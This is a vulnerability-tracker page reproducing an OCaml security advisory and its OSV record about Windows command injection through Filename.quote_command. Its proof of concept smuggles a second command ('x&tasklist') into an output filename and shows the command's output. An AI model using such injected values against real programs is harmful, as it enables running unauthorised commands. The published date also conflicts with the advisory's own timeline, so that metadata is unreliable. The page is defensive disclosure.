osec-2026-05
Vulnerability from osv_ocaml
Published
2026-04-18 13:45
Modified
2026-04-18 13:45
Summary
Windows command execution via filename quotes.
Details
The quoting of stdin/stdout/stderror (using Filename.quote_command) on Windows is not sufficient, and allows the & character to be passed through. This allows an attacker to inject a shell command if they can specify the stdin/stdout/stderr of a program to be executed.
Exploit
$ opam exec -- ocaml
OCaml version 4.14.2
Enter #help;; for help.
# let outfile = "x&tasklist" in
let cmd = Filename.quote_command "netsh.exe" ~stdout:outfile ["help"] in
ignore (Sys.command cmd)
;;
Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 Services 0 8 K
System 4 Services 0 168 K
Secure System 236 Services 0 191,468 K
Registry 276 Services 0 3,428 K
smss.exe 608 Services 0 1,676 K
csrss.exe 984 Services 0 5,928 K
Timeline
- 2026-06-18 release of this security advisory
- 2026-06-15 release of OCaml 4.14.4
- 2026-06-08 fix by David Allsopp https://github.com/ocaml/ocaml/pull/14853
- 2026-04-11 reported by Anil Madhavapeddy, forwarded from Andrew Nesbitt to security@ocaml.org
Severity
6.1 (Medium)
Credits
{
"affected": [
{
"ecosystem_specific": {
"opam_constraint": "ocaml {\u003c \"4.14.4\" | \u003e= \"5\" \u0026 \u003c \"5.5.0\"}"
},
"package": {
"ecosystem": "opam",
"name": "ocaml",
"purl": "pkg:opam/ocaml"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.14.4"
}
],
"type": "ECOSYSTEM"
},
{
"events": [
{
"introduced": "5"
},
{
"fixed": "5.5.0"
}
],
"type": "ECOSYSTEM"
},
{
"events": [
{
"introduced": "0"
},
{
"fixed": "ce6d0f7b67145debec57e296dcc49d8619259198"
}
],
"repo": "https://github.com/ocaml/ocaml",
"type": "GIT"
},
{
"events": [
{
"introduced": "0"
},
{
"fixed": "39d3f110eab62ab9f3013bb5f084af2dc3e3bb08"
}
],
"repo": "https://github.com/ocaml/ocaml",
"type": "GIT"
},
{
"events": [
{
"introduced": "0"
},
{
"fixed": "d5c65dc0034fbd75f10c6b54028e8b2740a7b189"
}
],
"repo": "https://github.com/ocaml/ocaml",
"type": "GIT"
}
],
"versions": [
"3.07",
"3.07+1",
"3.07+2",
"3.08.0",
"3.08.1",
"3.08.2",
"3.08.3",
"3.08.4",
"3.09.0",
"3.09.1",
"3.09.2",
"3.09.3",
"3.10.0",
"3.10.1",
"3.10.2",
"3.11.0",
"3.11.1",
"3.11.2",
"3.12.0",
"3.12.1",
"4.00.0",
"4.00.1",
"4.01.0",
"4.02.0",
"4.02.1",
"4.02.2",
"4.02.3",
"4.02.4",
"4.03.0",
"4.03.1",
"4.04.0",
"4.04.1",
"4.04.2",
"4.04.3",
"4.05.0",
"4.05.1",
"4.06.0",
"4.06.1",
"4.06.2",
"4.07.0",
"4.07.1",
"4.07.2",
"4.08.0",
"4.08.1",
"4.08.2",
"4.09.0",
"4.09.1",
"4.09.2",
"4.10.0",
"4.10.1",
"4.10.2",
"4.10.3",
"4.11.0",
"4.11.1",
"4.11.2",
"4.11.3",
"4.12.0",
"4.12.1",
"4.12.2",
"4.13.0",
"4.13.1",
"4.13.2",
"4.14.0",
"4.14.1",
"4.14.2",
"4.14.3",
"5.0.0",
"5.0.1",
"5.1.0",
"5.1.1",
"5.1.2",
"5.2.0",
"5.2.1",
"5.2.2",
"5.3.0",
"5.3.1",
"5.4.0",
"5.4.1",
"5.4.2"
]
}
],
"aliases": [
"CVE-2026-41083"
],
"credits": [
{
"name": "Andrew Nesbitt",
"type": "REPORTER"
},
{
"name": "David Allsopp",
"type": "REMEDIATION_DEVELOPER"
},
{
"name": "Florian Angeletti",
"type": "REMEDIATION_REVIEWER"
},
{
"name": "Hannes Mehnert",
"type": "COORDINATOR"
}
],
"database_specific": {
"cwe": [
"CWE-78"
],
"human_link": "https://github.com/ocaml/security-advisories/tree/main/advisories/2026/OSEC-2026-05.md",
"osv": "https://github.com/ocaml/security-advisories/tree/generated-osv/2026/OSEC-2026-05.json"
},
"details": "The quoting of stdin/stdout/stderror (using `Filename.quote_command`) on Windows is not sufficient, and allows the `\u0026` character to be passed through. This allows an attacker to inject a shell command if they can specify the stdin/stdout/stderr of a program to be executed.\n\n## Exploit\n\n```bash\n$ opam exec -- ocaml\nOCaml version 4.14.2\nEnter #help;; for help.\n\n# let outfile = \"x\u0026tasklist\" in\n let cmd = Filename.quote_command \"netsh.exe\" ~stdout:outfile [\"help\"] in\n ignore (Sys.command cmd)\n ;;\n\nImage Name PID Session Name Session# Mem Usage\n========================= ======== ================ =========== ============\nSystem Idle Process 0 Services 0 8 K\nSystem 4 Services 0 168 K\nSecure System 236 Services 0 191,468 K\nRegistry 276 Services 0 3,428 K\nsmss.exe 608 Services 0 1,676 K\ncsrss.exe 984 Services 0 5,928 K\n```\n\n## Timeline\n\n- 2026-06-18 release of this security advisory\n- 2026-06-15 release of OCaml 4.14.4\n- 2026-06-08 fix by David Allsopp https://github.com/ocaml/ocaml/pull/14853\n- 2026-04-11 reported by Anil Madhavapeddy, forwarded from Andrew Nesbitt to security@ocaml.org",
"id": "OSEC-2026-05",
"modified": "2026-04-18T13:45:00Z",
"published": "2026-04-18T13:45:00Z",
"references": [],
"schema_version": "1.7.4",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Windows command execution via filename quotes."
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…